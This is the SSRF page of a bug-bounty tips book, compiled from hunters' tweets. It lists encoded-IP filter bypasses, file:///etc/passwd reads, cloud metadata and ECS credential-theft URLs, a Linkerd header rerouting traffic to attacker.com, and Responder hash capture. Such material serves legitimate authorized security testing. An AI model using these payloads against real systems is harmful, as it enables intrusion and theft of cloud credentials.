Book of BugBounty Tips
  • Introduction
  • OSINT / Recon
  • API
  • Cross Site Request Forgery (CSRF)
  • Server Side Request Forgery (SSRF)
  • Sensitive Information Disclosure
  • Cross Site Scripting (XSS)
  • CRLF
  • Remote Code Execution (RCE)
  • Email Bypass
  • File Upload
  • Open Redirect
  • Insecure Direct Object Reference (IDOR)
  • Injection
  • XXE
  • Local / Remote File Inclusion
  • Authentication / Authorization
  • Account Takeover
  • Application Login
  • Clickjacking
  • Parameter Pollution
  • Fuzzing
  • Application Logic Bypasses
  • Bypasses
  • Mobile
  • Password Reset
  • Web Cache
  • Server Side Template Injection
  • Tips from @EdOverflow
  • Tips From @intigriti
  • Hackpack From @yeswehack
  • Tips from @YogoshaOfficial
  • Tips from @Jhaddix
  • Tips from Ben (@nahamsec)
  • Tips from Other Sources
  • Tips from Blog posts / other hunters
  • Others
  • Bugbounty Related Websites / Blogs
  • Docker and k8s
  • Tweets Collection by @Pentesterland
  • Windows
  • Linux
  • Burp suite
  • Scope Based Recon Tips
Powered by GitBook
On this page

Server Side Request Forgery (SSRF)

PreviousCross Site Request Forgery (CSRF)NextSensitive Information Disclosure

Last updated 1 month ago

http://127.1/
http://0000::1:80/
http://[::]:80/
http://2130706433/
http://whitelisted@127.0.0.1
http://0x7f000001/
http://017700000001
http://0177.00.00.01

Also using a redirect to localhost will often work.

file:///etc/passwd : Not authorized file://\/\/etc/passwd : Work

add this one to your wordlist : /_includes/framer.php juicy blind ssrf via `base` param

Found a JIRA SSRF and want to make it more impactful? Look for what's running on port 7990, you might end up in a BitBucket server running internally with public repo access. If yes, source code is just a few hacks away.
If an app accepts XLSX to convert to PDF/HTML it may run the file through MS Excel to eval formulas/convert. Try testing =WEBSERVICE(http://google.com ) and see if XML/HTML is added to the form (insta-SSRF). No clue excel even had this function #bugbountytip #bugbountytips
SSRF are file:///etc/passwd : Not authorized file://\/\/etc/passwd : Work
One ssrf/lfi I come across is using UNC file paths. If you’re testing a windows host and the application is loading file.txt you can replace that with \\http://dns.you.com\a and look for a dns hit and then try Responder if there’s egress or \\you.com@80\
When testing for SSRF, change the HTTP version from 1.1 to HTTP/0.9 and remove the host header completely. This has worked to bypass several SSRF fixes in the past. #bugbountytip #bugbountytip #bugbounty
When testing for SSRF using a black list, take internal IP addresses and when encoding them, dont encode entire IP. Encode 1 octet of the IP address, or 2 or 3. For Instance: AWS Metadata - 0251.254.169.254 (this got the $160,000 payout in Oct 2018) #bugbountytip #bugbounty
Got RCE or SSRF inside an AWS Lambda function? Request "localhost:9001/2018-06-01/runtime/invocation/next" for the function's event data. Check the HTTP headers returned too!@RhinoSecurity
#BugBounty
If you have an SSRF with file system access on an ECS instance then try extracting /proc/self/environ to get UUID and then try hitting ECS metadata curl http://169.254.170.2/v2/credentials/
This way you'll extract IAM keys of the attached role
SSRF at an endpoint looking for a valid YouTube url. http://127.0.0.1:80 doesn’t work but http://127.0.0.1:80?http://youtu.be/dQw4w9WgXcQ works
SSRF AWS Bypasses to access metadata endpoint. Converted Decimal IP: http://2852039166/latest/meta-data/ IPV6 Compressed: http://[::ffff:a9fe:a9fe]/latest/meta-data/ IPV6 Expanded: http://[0:0:0:0:0:ffff:a9fe:a9fe]/latest/meta-data/ #bugbounty #bugbountytips #bugbountytip
SSRF Bypass list for localhost (127.0.0.1):
SSRF payloads http://[::]:80/ http://[::]:25/ SMTP http://[::]:22/ SSH http://[::]:3128/ http://0000::1:80/ http://0000::1:25/ SMTP http://0000::1:22/ SSH http://0000::1:3128/ http://0177.0.0.1/ http://2130706433/ = http://127.0.0.1 http://3232235521/ http://192.168.0.1
A small Burpsuite trick which helped me to find Blind SSRF -
Step 1: Use Intruder to Bruteforce Headers Step 2: Add Burp collaborator URL as value. Step 3: Add prefix numerical payload (Pitchfork) Step 4: Use Tarborator Extension to monitor hits
When you find a public form (contact form,etc.) try these payloads (blind ssrf), if you receive a request on your server, try SSTI... #bugbountytips #bugbounty #bugbou
ntytip
#bugbountytips
#bugbountytip
If you have a blind SSRF that can only read images (but for some reason can't read ICO files), try and find Confluence running on the internal network and request /images/icons/linkext7.gif to prove that you can access internal resources
#BugBounty Tip: When you find an SSRF vulnerability, run Responder on your server and make the vulnerable system connect back to you. Sometimes you can get NetNTLM hashes and either crack them or escalate it to an SMB Relay attack. #bugbountytip
Use URLs with embedded credentials (e.g. http://user:pass@target.com) to login on internal http services when exploiting SSRF vulnerability.
#bugbountytip Found Linkerd service (look for headers such as “Via: linkerd” or “l5d-*”)? Try SSRF by overriding dtab via request header, e.g. “l5d-dtab: /svc/* => /$/inet/attacker.com/80” to reach your server or “l5d-dtab: /svc/* => /$/inet/169.254.169.254/80” for AWS metadata.
In case you wanted to test an SSRF but don't own a vps and burp collaborator is blocked you can use this https://canarytokens.org/generate
#Bugbountytip Got a SSRF? no metadata endpoints to hit? Try https://kubernetes.default.svc/metrics if you get a load crap come back jackpot you've hit the kubernetes API and this should indicate it's shit the bed time for any security team. (url can change)
When you have a SSRF vulnerability on a Google Cloud server, the fastest way to grab all internal metadata is this "All in one" payload : hxxp://metadata.google.internal/computeMetadata/v1beta1/?recursive=true #BugBountyTip
Just had a weird SSRF 'bypass' which would only pull data from their domain so anything you queried would be hxxps://www.theirdomain.com/reflectedhere/. Weirdly using /%2F//mysite.com/ caused it to hit external sites. Why? I have no idea. #bugbountytip
When dealing with SVG XLINK SSRF, in order to fingerprint the versions of libraries on vulnerable server, Generate the wordlist locally and fuzz it. find /usr -type f -name "*.png" >> all_usr_png.txt #bugbountytip
#bugbountytip Use URLs with embedded credentials (e.g. http://user:pass@target.com) to login on internal http services when exploiting SSRF vulnerability.
Did you find the #SSRF, but http://169.254.169.254/ is blacklisted? #protip try http://0xA9FEA9FE/, http://0251.0376.0251.0376/ or get more examples from @agarri_fr talk
#BugBounty #bugbounties #bugbountytip #infosec Bypass #SSRF filters by using http://127.1 instead of http://127.0.0.1 It resolves to the same but confuses filters blocking localhost/127.0.0.1 specifically!
#SSRF #ProTip Sometimes, the server appends something (path, parameters, ...) to an URL your control. Simply add "#" to your URL, that may work!
169.254.169.254 http://169.254.169.254.xip.io credit to @xenonxesece tweet. #SSRF #bugbountytips #Bugcrowd #bugbounty
✅
https://twitter.com/SMHTahsin33/status/1293601681834307584?s=20
https://twitter.com/z0idsec/status/1301145611303940096?s=20
❌